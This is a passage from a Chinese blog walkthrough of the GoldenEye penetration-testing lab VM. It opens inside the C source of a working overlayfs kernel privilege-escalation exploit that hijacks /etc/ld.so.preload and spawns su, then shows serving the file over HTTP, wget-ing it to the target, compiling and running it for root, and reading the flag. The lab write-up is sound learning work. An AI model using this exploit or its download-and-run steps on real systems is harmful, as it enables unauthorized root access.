class="keyword">if</span>(unshare(CLONE_NEWUSER) != <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"failed to create new user namespace\n"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>((init = fork()) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">pid_t</span> pid =</span><br><span class="line">                clone(child_exec, child_stack + (<span class="number">1024</span>*<span class="number">1024</span>), clone_flags, <span class="literal">NULL</span>);</span><br><span class="line">            <span class="keyword">if</span>(pid &lt; <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"failed to create new mount namespace\n"</span>);</span><br><span class="line">                <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            waitpid(pid, &amp;status, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        waitpid(init, &amp;status, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    usleep(<span class="number">300000</span>);</span><br><span class="line"></span><br><span class="line">    wait(<span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"child threads done\n"</span>);</span><br><span class="line"></span><br><span class="line">    fd = <span class="built_in">open</span>(<span class="string">"/etc/ld.so.preload"</span>,O_WRONLY);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(fd == <span class="number">-1</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"exploit failed\n"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"/etc/ld.so.preload created\n"</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"creating shared library\n"</span>);</span><br><span class="line">    lib = <span class="built_in">open</span>(<span class="string">"/tmp/ofs-lib.c"</span>,O_CREAT|O_WRONLY,<span class="number">0777</span>);</span><br><span class="line">    <span class="built_in">write</span>(lib,LIB,<span class="built_in">strlen</span>(LIB));</span><br><span class="line">    <span class="built_in">close</span>(lib);</span><br><span class="line">    lib = system(<span class="string">"cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"</span>);</span><br><span class="line">    <span class="keyword">if</span>(lib != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"couldn't create dynamic library\n"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">write</span>(fd,<span class="string">"/tmp/ofs-lib.so\n"</span>,<span class="number">16</span>);</span><br><span class="line">    <span class="built_in">close</span>(fd);</span><br><span class="line">    system(<span class="string">"rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"</span>);</span><br><span class="line">    execl(<span class="string">"/bin/su"</span>,<span class="string">"su"</span>,<span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
<p>然后在本目录下开启http服务：python -m SimpleHTTPServer 8888<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932063361.png" alt=""></p>
<p>在靶机下载该C文件，wget <a href="http://172.16.50.128:8888/37292.c" target="_blank" rel="noopener">http://172.16.50.128:8888/37292.c</a><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932294513.png" alt=""></p>
<p>CC编译之，cc -o exp 37292.c<br>赋予其执行权限，chmod +x exp<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932554011.png" alt=""></p>
<p>执行exp程序，获取root权限<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932745321.png" alt=""></p>
<h2 id="2-9-查看隐藏flag文件"><a href="#2-9-查看隐藏flag文件" class="headerlink" title="2.9 查看隐藏flag文件"></a>2.9 查看隐藏flag文件</h2><p>切换路径：cd /root<br>列出路径下隐藏文件：ls -la<br>读取flag文件，获取flag：cat .flag.txt<br>568628e0d993b1973adc718237da6e93<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932789172.png" alt=""></p>
<h1 id="三、感受分享"><a href="#三、感受分享" class="headerlink" title="三、感受分享"></a>三、感受分享</h1><p>周日晚上查看大余的视频教程，并下载环境部署，尝试打该靶场，周一上午完成，体验不错，但是过程未记录。</p>
<p>周二晚上开始重新再打一遍，目的是记录第一次打靶机的过程，由于当天公司加班，回家已经10点半，搞到1点，完成了一半进度。</p>
<p>周三单位加班回到家11点，继续搞到1点，剩余内核提权部分。</p>
<p>周四同样单位加班回到家11点，完成剩余部分，整理整份笔记。</p>
<p>视力不行很影响效率，看视频还要经常使用调节器把字调大才看的清，比别人更花时间和精力，但是好在坚持下来了。</p>
<p>完成！才刚开始！加油！</p>
<hr>
<p>文章使用小书匠MarkDown编辑器书写，大家可以通过本站<a href="https://tacgib.cn/2019/07/06/小书匠邀请码/">小书匠邀请码</a>一文获取<strong>邀请码</strong>及<strong>下载链接</strong>。</p>
<hr>
<center>秋风木叶</center>
<center>2023年1月6日</center>
    </div>

    
    
    
        <div class="reward-container">
  <div>有您的赞赏，我会更加有动力！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="https://zhengjie.ren/小书匠/1587477501749.png21" alt="秋风木叶 支付宝">
        <p>支付宝</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="https://zhengjie.ren/小书匠/1615647836412.png" alt="秋风木叶 微信支付">
        <p>微信支付</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>秋风木叶
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://tacgib.cn/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/" title="渗透靶场笔记1：GoldenEye">https://tacgib.cn/2023/01/06/渗透靶场笔记1：GoldenEye/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%B0%8F%E4%B9%A6%E5%8C%A0-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E7%AC%94%E8%AE%B0-%E9%9D%B6%E5%9C%BA-%E5%AD%A6%E4%B9%A0/" rel="tag"># 小书匠,渗透测试,笔记,靶场,学习</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/10/16/%E6%97%A0%E9%A2%98/" rel="prev" title="无题">
      <i class="fa fa-chevron-left"></i> 无题
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/01/19/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B02%EF%BC%9ALampiao/" rel="next" title="渗透靶场笔记2：Lampiao">
      渗透靶场笔记2：Lampiao <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#一、环境配置"><span class="nav-text">一、环境配置</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-虚拟机网络配置"><span class="nav-text">1.1 虚拟机网络配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-测试网络配置"><span class="nav-text">1.2 测试网络配置</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#二、打靶记录"><span class="nav-text">二、打靶记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-靶机ip获取"><span class="nav-text">2.1 靶机ip获取</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-进一步信息收集"><span class="nav-text">2.2 进一步信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-3-爆破邮箱账号，获取邮件信息"><span class="nav-text">2.3 爆破邮箱账号，获取邮件信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-4-破解通过隐写术加载信息的图片"><span class="nav-text">2.4 破解通过隐写术加载信息的图片</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-5-使用管理员账号登录后台，搜索可利用漏洞"><span class="nav-text">2.5 使用管理员账号登录后台，搜索可利用漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-6-MSF进行漏洞利用获取shell"><span class="nav-text">2.6 MSF进行漏洞利用获取shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-7-尝试nc-后台命令执行获取shell"><span class="nav-text">2.7 尝试nc+后台命令执行获取shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-8-内核提权"><span class="nav-text">2.8 内核提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-9-查看隐藏flag文件"><span class="nav-text">2.9 查看隐藏flag文件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#三、感受分享"><span class="nav-text">三、感受分享</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">秋风木叶</p>
  <div class="site-description" itemprop="description">一片宁静自由的空间……</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">91</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">93</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://tacgib.cn/" title="https:&#x2F;&#x2F;tacgib.cn">Title</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">秋风木叶</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  













<script>
if (document.querySelectorAll('pre.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js', () => {
    mermaid.initialize({
      theme    : 'forest',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    });
  }, window.mermaid);
}
</script>


  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : true,
      appId      : 'JPt4HeuQbSMjT4cQoLKEphX7-gzGzoHsz',
      appKey     : 'J2t8poEMDg21tmRTFirjHgqx',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
